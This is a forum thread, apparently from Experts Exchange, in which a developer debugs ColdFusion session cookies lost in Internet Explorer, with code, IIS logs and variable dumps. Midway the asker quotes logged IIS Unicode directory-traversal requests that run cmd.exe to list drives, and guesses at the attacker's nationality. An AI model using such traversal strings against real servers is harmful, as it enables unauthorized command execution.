2) Cookie.CFID = 24, Cookie.CFMAGIC = 24:85905525, Cookie.CFTOKEN = 85905525, and Cookie.USER_INFO no longer exists.
3) Session.CFID = 24, Session.CFTOKEN 85905525, and Session.USER_INFO no longer exists.
4) Client.CFID = 24, Client.CFToken = 85905525, and Client.USER_INFO no longer exists.
another good read:
http://www.thenetprofits.co.uk/coldfusion/faq/topic.cfm?TopicID=1#answer63
http://www.thenetprofits.co.uk/coldfusion/faq/topic.cfm?TopicID=1#answer63
ASKER
The value of MySessionTimeOut is:
<!--- Use a variable for session time out so it can be used as the query cached period --->
<cfset MySessionTimeOut="#CreateT imeSpan(0, 1, 0, 0)#">
<!--- Use a variable for session time out so it can be used as the query cached period --->
<cfset MySessionTimeOut="#CreateT
try some of the above.. let us know the results.
CJ
CJ
ASKER
In Application.cfm I changed this:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA pplication Name"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession TimeOut#"
setdomaincookies="Yes"
>
<!--- Re-write the session cookies so they will only be memory cookies. --->
<cfcookie name="CFID" value="#Cookie.CFID#">
<cfcookie name="CFTOKEN" value="#Cookie.CFTOKEN#">
to this:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA pplication Name"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession TimeOut#"
setclientcookies="No"
>
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#">
</cflock>
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession
setdomaincookies="Yes"
>
<!--- Re-write the session cookies so they will only be memory cookies. --->
<cfcookie name="CFID" value="#Cookie.CFID#">
<cfcookie name="CFTOKEN" value="#Cookie.CFTOKEN#">
to this:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession
setclientcookies="No"
>
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#">
</cflock>
ASKER
The CFID is still changing after I made the above changes to Application.cfm. Before hitting the submit button:
CFID 25
CFToken 33044530
After hitting the submit button:
CFID 26
CFToken 39078247
CFID 25
CFToken 33044530
After hitting the submit button:
CFID 26
CFToken 39078247
This is very odd.
Can you outline your path/process and entail what happens vs what is supposed to happen.
Thanx,
CJ
Can you outline your path/process and entail what happens vs what is supposed to happen.
Thanx,
CJ
ASKER
But why would any cfcookie action work if I'm losing CGI.HTTP_COOKIE on the way back? I think version 6.0.2800.1106 of Internet Explorer is the problem. I don't lose my CFID cookies when I use Mozilla 1.3 (Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312), and, excepting the workarounds for the lack of response to cflocation, I don't lose Session.User_Info and Client_Info either. Strangely, I was never able to set Cookie.User_Info.
HTTP_COOKIE
Name-value pair stored earlier at the client by the server
Means if the Server hasn't set any cookies yet it will be blank.
I think it maybe an issue with the domain/path.
try this:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA pplication Name"
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession TimeOut#"
setclientcookies="No"
>
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#" domain="yourproductionserv er.net" path="/">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#"d omain="you rproductio nserver.ne t" path="/">
</cflock>
CJ
Name-value pair stored earlier at the client by the server
Means if the Server hasn't set any cookies yet it will be blank.
I think it maybe an issue with the domain/path.
try this:
<!--- Create an arbitrary (but consistently used) scope for log ins --->
<cfapplication
name="MyProductionServerzA
clientmanagement="Yes"
sessionmanagement="Yes"
sessiontimeout="#MySession
setclientcookies="No"
>
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#" domain="yourproductionserv
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#"d
</cflock>
CJ
ASKER
1) I go to the home page.
a) IIS passes the default document and the browser's CGI variables to the CF Server.
b) The CF Server runs Application.cfm first and does little because the default document is on the approved list.
c) The default document and its login form (cfincluded) are run.
2) I fill in my user id and password and click the submit button.
a) IIS passes the login template and the browser's CGI variables to the CF Server.
b) The CF Server runs Application.cfm first and does little because the login template is on the approved list.
c) The login template is run.
i) The user info cookie is set.
ii) The browser is cflocated to the central station template.
d) IIS passes the central station template and the browser's CGI variables to the CF Server.
e) The CF Server runs Application.cfm first and does little because the user info cookie is set.
f) The central station template is run and a clock in form is built for me to click on.
3) I click the submit button in the clock in form.
a) IIS passes the clockin template and SHOULD HAVE PASSED the browser's CGI variables to the CF Server, but doesn't for some reason.
b) The CF Server runs Application.cfm first and discovers that the browser's CGI variables are missing.
i) The login form is cfincluded.
ii) The Application.cfm template is aborted.
a) IIS passes the default document and the browser's CGI variables to the CF Server.
b) The CF Server runs Application.cfm first and does little because the default document is on the approved list.
c) The default document and its login form (cfincluded) are run.
2) I fill in my user id and password and click the submit button.
a) IIS passes the login template and the browser's CGI variables to the CF Server.
b) The CF Server runs Application.cfm first and does little because the login template is on the approved list.
c) The login template is run.
i) The user info cookie is set.
ii) The browser is cflocated to the central station template.
d) IIS passes the central station template and the browser's CGI variables to the CF Server.
e) The CF Server runs Application.cfm first and does little because the user info cookie is set.
f) The central station template is run and a clock in form is built for me to click on.
3) I click the submit button in the clock in form.
a) IIS passes the clockin template and SHOULD HAVE PASSED the browser's CGI variables to the CF Server, but doesn't for some reason.
b) The CF Server runs Application.cfm first and discovers that the browser's CGI variables are missing.
i) The login form is cfincluded.
ii) The Application.cfm template is aborted.
ASKER
This is what the IIS log looks like when I perform the above steps:
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-21 19:44:21
#Fields: time cs-method cs-uri-stem cs-uri-query cs(Cookie) cs(Referer)
19:44:21 GET /index.cfm - CFMAGIC=25%3A33044530;+USE R_INFO=... this-is-a- really-big -cookie-du des...;+CF ID=39;+CFT OKEN=99788 566 -
19:44:28 POST /logon.cfm - CFMAGIC=25%3A33044530;+USE R_INFO=... this-is-a- really-big -cookie-du des...;+CF ID=39;+CFT OKEN=99788 566 http://davezcompaq/
19:44:28 GET /central_station.cfm C2CD1387-F54E-4C17-BDC4186 F20C6C5AB CFMAGIC=25%3A33044530;+USE R_INFO=... this-is-a- really-big -cookie-du des...;+CF ID=39;+CFT OKEN=99788 566 -
19:44:49 POST /_PM/time/time_clock_out_c onfirm.cfm - CFMAGIC=25%3A33044530;+USE R_INFO=... this-is-a- really-big -cookie-du des...;+CF ID=39;+CFT OKEN=99788 566 http://davezcompaq/central_station.cfm?C2CD1387-F54E-4C17-BDC4186F20C6C5AB
This suggests to me that since IIS is logging the user info cookie it is probably passing that cookie onto the CF server. I don't understand why the cf magic cookie does not mesh with the cf id and cf token cookies, though.
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-03-21 19:44:21
#Fields: time cs-method cs-uri-stem cs-uri-query cs(Cookie) cs(Referer)
19:44:21 GET /index.cfm - CFMAGIC=25%3A33044530;+USE
19:44:28 POST /logon.cfm - CFMAGIC=25%3A33044530;+USE
19:44:28 GET /central_station.cfm C2CD1387-F54E-4C17-BDC4186
19:44:49 POST /_PM/time/time_clock_out_c
This suggests to me that since IIS is logging the user info cookie it is probably passing that cookie onto the CF server. I don't understand why the cf magic cookie does not mesh with the cf id and cf token cookies, though.
cfid and cftoken didn't seem to change.
cfmagic is a tricky thing.. here is some explanation about it:
http://docs.jcu.edu.au/cold_fusion/cfdocs/Allaire_Support/new.htm#setdomaincookies
CJ
cfmagic is a tricky thing.. here is some explanation about it:
http://docs.jcu.edu.au/cold_fusion/cfdocs/Allaire_Support/new.htm#setdomaincookies
CJ
ASKER
Since I started posting comments, someone at www.asobens.com.mx is trying to run my cmd.exe via my production server. I guess I'm leaving too much info in these comments. Erk. :-(
>someone at www.asobens.com.mx is trying to run my cmd.exe
someone is trying to hack your server from what you have posted here? Wow, that sux. I will get an Admin involved to see if they can find out what/who is trying.
I would take some security measures of disable cfexecute and any remote invocation cf code.
make sure you are not evaluating or executing anything passed via url params.
CJ
someone is trying to hack your server from what you have posted here? Wow, that sux. I will get an Admin involved to see if they can find out what/who is trying.
I would take some security measures of disable cfexecute and any remote invocation cf code.
make sure you are not evaluating or executing anything passed via url params.
CJ
ASKER
In Application.cfm I changed this:
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#">
</cflock>
to this:
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#" domain=".#CGI.SERVER_NAME# " path="/">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#" domain=".#CGI.SERVER_NAME# " path="/">
</cflock>
and in some cases I was not forced to re-logon! I will peruse the literature made available to me and get back to you. :-)
Thanx
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#">
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#">
</cflock>
to this:
<!--- CF will not set the client cookies automatically, so set them manually as per-session cookies --->
<cflock timeout="5" throwontimeout="No" type="READONLY" scope="SESSION">
<cfcookie name="CFID" value="#Session.CFID#" domain=".#CGI.SERVER_NAME#
<cfcookie name="CFTOKEN" value="#Session.CFTOKEN#" domain=".#CGI.SERVER_NAME#
</cflock>
and in some cases I was not forced to re-logon! I will peruse the literature made available to me and get back to you. :-)
Thanx
ASKER
Somebody from d-11-127.dhcp-156-56.india na.edu is trying every combination of \
[Edited by Cerebro]
http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+C:\ http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+D:\ http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+E:\ etc.
[Edited by Cerebro]
Does anyone know what this is? It looks like the UNICODE exploit for IIS 5.0/4.0 circa May 14, 2001. Probably that Mexican guy that works for Asociacion de Distribuidores Mercedes Benz, A.C. is doing it. LOL! Who knows. :-)
[Edited by Cerebro]
http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+C:\ http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+D:\ http://127.0.0.1/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+E:\ etc.
[Edited by Cerebro]
Does anyone know what this is? It looks like the UNICODE exploit for IIS 5.0/4.0 circa May 14, 2001. Probably that Mexican guy that works for Asociacion de Distribuidores Mercedes Benz, A.C. is doing it. LOL! Who knows. :-)
dbabbit: As per your request I have edited and removed references to an IP address or server name that may reveal to malicious users your production server's address.
If I have missed a comment/line please let me know and I will fix that.
If I can be of any other assistance please let me know.
Cerebro
Community Moderator
Experts Exchange
If I have missed a comment/line please let me know and I will fix that.
If I can be of any other assistance please let me know.
Cerebro
Community Moderator
Experts Exchange
Any updates dbabbit?
I am curious that the change fixed in some cases but not all.
CJ
I am curious that the change fixed in some cases but not all.
CJ
ASKER
Yes, the complicated javascript-activated form I was using for testing works now, everything else still causes a forced relogin page to come up. Nothing about this form has been changed. I'm planning on slowly removing header and form information and retesting each time to see it I can pinpoint some combination that makes this not work.
ASKER
If I View Source, copy the html to a file called bad.htm, view that in the browser, then click on the offending submits, the page behaves as it should. It's possibly something in the header, for instance something that can be changed with cfheader. I'm going to methodically remove CFML from the templates until I can cause the page to stop misbehaving.
are the cfid and cftoken still changing?
are you using cflocation anywhere?
CJ
are you using cflocation anywhere?
CJ
ASKER
Well, given that .htm files don't have cfids and cftokens, I copied the HTML to another file, called bad.cfm.
Before I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above (except CGI.HTTP_REFERER) exist.
2) Cookie.CFID = 125, Cookie.CFMAGIC = 25:33044530, Cookie.CFTOKEN = 56316595, and Cookie.USER_INFO exists.
3) Session.CFID = 125, Session.CFTOKEN 56316595, and Session.USER_INFO does not exist.
4) Client.CFID = 125, Client.CFToken = 56316595, and Client.USER_INFO does not exist.
After I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above exist.
2) Cookie.CFID = 127, Cookie.CFMAGIC = 25:33044530, Cookie.CFTOKEN = 75829985, and Cookie.USER_INFO still exists.
3) Session.CFID = 127, Session.CFTOKEN 75829985, and Session.USER_INFO still does not exist.
4) Client.CFID = 127, Client.CFToken = 75829985, and Client.USER_INFO still does not exist.
Before I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above (except CGI.HTTP_REFERER) exist.
2) Cookie.CFID = 125, Cookie.CFMAGIC = 25:33044530, Cookie.CFTOKEN = 56316595, and Cookie.USER_INFO exists.
3) Session.CFID = 125, Session.CFTOKEN 56316595, and Session.USER_INFO does not exist.
4) Client.CFID = 125, Client.CFToken = 56316595, and Client.USER_INFO does not exist.
After I push the submit button:
1) All the various CGI.HTTP_* variables mentioned above exist.
2) Cookie.CFID = 127, Cookie.CFMAGIC = 25:33044530, Cookie.CFTOKEN = 75829985, and Cookie.USER_INFO still exists.
3) Session.CFID = 127, Session.CFTOKEN 75829985, and Session.USER_INFO still does not exist.
4) Client.CFID = 127, Client.CFToken = 75829985, and Client.USER_INFO still does not exist.
ASKER
I insert a self-calling control panel whose form action is itself. When the control panel detects that its referrer was itself, is does some database action then this:
<!--- Go back to where you came from --->
<CFLOCATION ADDTOKEN="No" URL="#CGI.HTTP_REFERER#">
<!--- Go back to where you came from --->
<CFLOCATION ADDTOKEN="No" URL="#CGI.HTTP_REFERER#">
ASKER
I've got the templates pared down to just the javascript-enable form and the normal form - no <head></head>, etc.
Before I click the javascript-enabled form link or the submit button:
Cookie.CFID 191
Cookie.CFMAGIC 25:33044530
Cookie.CFTOKEN 83813765
Cookie.USER_INFO (defined)
Session.CFID 191
Session.CFTOKEN 83813765
Session.USER_INFO (not defined)
Client.CFID 191
Client.CFToken 83813765
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip, deflate
CGI.HTTP_ACCEPT_LANGUAGE en-us
CGI.HTTP_CACHE_CONTROL no-cache
CGI.HTTP_CONNECTION Keep-Alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE (blank)
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; iOpus-I-M)
After I click the javascript-enabled form link:
Cookie.CFID 191
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 83813765
Cookie.USER_INFO (not defined)
Session.CFID 191
Session.CFTOKEN 83813765
Session.USER_INFO (not defined)
Client.CFID 191
Client.CFToken 83813765
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING (blank)
CGI.HTTP_ACCEPT_LANGUAGE (blank)
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION (blank)
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-url encoded
CGI.HTTP_COOKIE (blank)
CGI.HTTP_HOST (blank)
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT (blank)
After I click the submit button:
Cookie.CFID 192
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 70077366
Cookie.USER_INFO (not defined)
Session.CFID 192
Session.CFTOKEN 70077366
Session.USER_INFO (not defined)
Client.CFID 192
Client.CFToken 70077366
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING (blank)
CGI.HTTP_ACCEPT_LANGUAGE (blank)
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION (blank)
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-url encoded
CGI.HTTP_COOKIE (blank)
CGI.HTTP_HOST (blank)
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT (blank)
Before I click the javascript-enabled form link or the submit button:
Cookie.CFID 191
Cookie.CFMAGIC 25:33044530
Cookie.CFTOKEN 83813765
Cookie.USER_INFO (defined)
Session.CFID 191
Session.CFTOKEN 83813765
Session.USER_INFO (not defined)
Client.CFID 191
Client.CFToken 83813765
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip, deflate
CGI.HTTP_ACCEPT_LANGUAGE en-us
CGI.HTTP_CACHE_CONTROL no-cache
CGI.HTTP_CONNECTION Keep-Alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE (blank)
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; iOpus-I-M)
After I click the javascript-enabled form link:
Cookie.CFID 191
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 83813765
Cookie.USER_INFO (not defined)
Session.CFID 191
Session.CFTOKEN 83813765
Session.USER_INFO (not defined)
Client.CFID 191
Client.CFToken 83813765
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING (blank)
CGI.HTTP_ACCEPT_LANGUAGE (blank)
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION (blank)
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-url
CGI.HTTP_COOKIE (blank)
CGI.HTTP_HOST (blank)
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT (blank)
After I click the submit button:
Cookie.CFID 192
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 70077366
Cookie.USER_INFO (not defined)
Session.CFID 192
Session.CFTOKEN 70077366
Session.USER_INFO (not defined)
Client.CFID 192
Client.CFToken 70077366
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING (blank)
CGI.HTTP_ACCEPT_LANGUAGE (blank)
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION (blank)
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-url
CGI.HTTP_COOKIE (blank)
CGI.HTTP_HOST (blank)
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT (blank)
ASKER
This is what Mozilla 1.3 (Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312) looks like. Remember, I've got the templates pared down to just the javascript-enable form and the normal form - no <head></head>, etc.
Before I click the javascript-enabled form link or the submit button:
Cookie.CFID 195
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 30653229
Cookie.USER_INFO (defined)
Session.CFID 195
Session.CFTOKEN 30653229
Session.USER_INFO (not defined)
Client.CFID 195
Client.CFToken 30653229
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0. 9
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE (blank)
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
Clicking the javascript-enabled form link works!! Here is the data:
Cookie.CFID 195
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 30653229
Cookie.USER_INFO (defined)
Session.CFID 195
Session.CFTOKEN 30653229
Session.USER_INFO (not defined)
Client.CFID 195
Client.CFToken 30653229
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0. 9
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-url encoded
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
After I (push the Back button and) click the submit button, it works again!!! Here is the data:
Cookie.CFID 196
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 33679268
Cookie.USER_INFO (defined)
Session.CFID 196
Session.CFTOKEN 33679268
Session.USER_INFO (not defined)
Client.CFID 196
Client.CFToken 33679268
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0. 9
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-url encoded
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
I don't know what to make of the fact that it works where MSIE doesn't, or the fact that the CFID has changed on the submit button but not on the javascript-enabled form link.
Before I click the javascript-enabled form link or the submit button:
Cookie.CFID 195
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 30653229
Cookie.USER_INFO (defined)
Session.CFID 195
Session.CFTOKEN 30653229
Session.USER_INFO (not defined)
Client.CFID 195
Client.CFToken 30653229
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0.
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE (blank)
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (blank)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
Clicking the javascript-enabled form link works!! Here is the data:
Cookie.CFID 195
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 30653229
Cookie.USER_INFO (defined)
Session.CFID 195
Session.CFTOKEN 30653229
Session.USER_INFO (not defined)
Client.CFID 195
Client.CFToken 30653229
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0.
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-url
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
After I (push the Back button and) click the submit button, it works again!!! Here is the data:
Cookie.CFID 196
Cookie.CFMAGIC (not defined)
Cookie.CFTOKEN 33679268
Cookie.USER_INFO (defined)
Session.CFID 196
Session.CFTOKEN 33679268
Session.USER_INFO (not defined)
Client.CFID 196
Client.CFToken 33679268
Client.USER_INFO (not defined)
CGI.HTTP_ACCEPT_ENCODING gzip,deflate,compress;q=0.
CGI.HTTP_ACCEPT_LANGUAGE en-us,en;q=0.5
CGI.HTTP_CACHE_CONTROL (blank)
CGI.HTTP_CONNECTION keep-alive
CGI.HTTP_CONTENT_LENGTH 0
CGI.HTTP_CONTENT_TYPE application/x-www-form-url
CGI.HTTP_COOKIE (defined)
CGI.HTTP_HOST davezcompaq
CGI.HTTP_REFERER (defined)
CGI.HTTP_USER_AGENT Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3) Gecko/20030312
I don't know what to make of the fact that it works where MSIE doesn't, or the fact that the CFID has changed on the submit button but not on the javascript-enabled form link.
ASKER
The reason that the CFID does not increase when I click the javascript-enabled form link is because I am passing Session.URLToken in the URL. When I strip that out the CFID, it behaves just like the submit button.
ASKER
Here is the pared-down CFML:
<cfoutput><html><body>
<cfscript>
FormAction = "http://" & CGI.SERVER_NAME & CGI.SCRIPT_NAME;
FormAction = FormAction & "?" & Session.URLToken;
FormName="javascriptEnable dForm";
</cfscript>
<form
action="#FormAction#"
method="post"
name="#FormName#"
><a
href="javascript:this.docu ment.forms ['#FormNam e#'].submi t()"
>javascript-enabled form link</a></form>
<form
action="#FormAction#"
method="post"
><input
type="submit"
value="Submit Button"
></form>
</body></html></cfoutput>
I can paste this or the HTML it displays into a different template and that template runs fine. I'm going to start work on paring down the Application.cfm.
<cfoutput><html><body>
<cfscript>
FormAction = "http://" & CGI.SERVER_NAME & CGI.SCRIPT_NAME;
FormAction = FormAction & "?" & Session.URLToken;
FormName="javascriptEnable
</cfscript>
<form
action="#FormAction#"
method="post"
name="#FormName#"
><a
href="javascript:this.docu
>javascript-enabled form link</a></form>
<form
action="#FormAction#"
method="post"
><input
type="submit"
value="Submit Button"
></form>
</body></html></cfoutput>
I can paste this or the HTML it displays into a different template and that template runs fine. I'm going to start work on paring down the Application.cfm.
ASKER
I really don't know how to pare down the Application.cfm: I mean, if I remove the logic that inserts the login form, of course it doesn't force a login! :-) Below are the boolean expressions within Application.cfm that determine the need to force a login.
MSIE and Mozilla before:
IsDefined('Access') Yes
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProduct ionServerz Applicatio nName') No
MSIE after (either form):
IsDefined('Access') No
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProduct ionServerz Applicatio nName') No
Mozilla after (either form):
IsDefined('Access') Yes
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProduct ionServerz Applicatio nName') No
Notice how my application name is never authenticated? If this is the wrong way to go about it, what system should I use then?
MSIE and Mozilla before:
IsDefined('Access') Yes
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProduct
MSIE after (either form):
IsDefined('Access') No
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProduct
Mozilla after (either form):
IsDefined('Access') Yes
ListFindNoCase(TrustList, CGI.SCRIPT_NAME) No
IsAuthenticated('MyProduct
Notice how my application name is never authenticated? If this is the wrong way to go about it, what system should I use then?
why don't you just remove the isAuthenticated part.
if the session var exists.. and that session var is created my your login app.. then they must be authenticated right?
CJ
if the session var exists.. and that session var is created my your login app.. then they must be authenticated right?
CJ
ASKER
I think the key is the relocation javascript in the logon page:
<cfoutput><script
type="text/jscript"
>
window.location.href = 'http:/' + '/#CGI.SERVER_NAME##Centra lStationRe direct#?#S ession.URL Token#&#Cr eateUUID() #';
</script></cfoutput>
Is window.location.href no longer supported like it used to be? I have to actually go through the logon page and let it redirect me to another page in order to get the symptoms to appear; if I paste what seems like the offending code into another template and just show that template, I don't have the problem. If I use Mozilla, I end up having to skip over to the template in a similar manner. (This is because the window.location.href thing doesn't actually relocate you in Mozilla.)
<cfoutput><script
type="text/jscript"
>
window.location.href = 'http:/' + '/#CGI.SERVER_NAME##Centra
</script></cfoutput>
Is window.location.href no longer supported like it used to be? I have to actually go through the logon page and let it redirect me to another page in order to get the symptoms to appear; if I paste what seems like the offending code into another template and just show that template, I don't have the problem. If I use Mozilla, I end up having to skip over to the template in a similar manner. (This is because the window.location.href thing doesn't actually relocate you in Mozilla.)
why are you using javascript redirect rather than cflocation?
CJ
CJ
ASKER
I had problems with it in the past. What does cflocation do these days?
<clocation url="whatever" addtoken="yes">
will redirect and add your cfid, cftoken to the url.
as long as you are not setting any cookies, cflocation is a good choice.
CJ
will redirect and add your cfid, cftoken to the url.
as long as you are not setting any cookies, cflocation is a good choice.
CJ
ASKER
Well, I AM setting cookies. The User_Info cookie. Got any other ideas?
a meta refresh?
CJ
CJ
ASKER
How about this:
<cfheader
statuscode="302"
statustext="Object Temporarily Moved"
>
<cfheader
name="location"
value="http://#CGI.SERVER_NAME##CentralStationRedirect#?#Session.URLToken#&#CreateUUID()#"
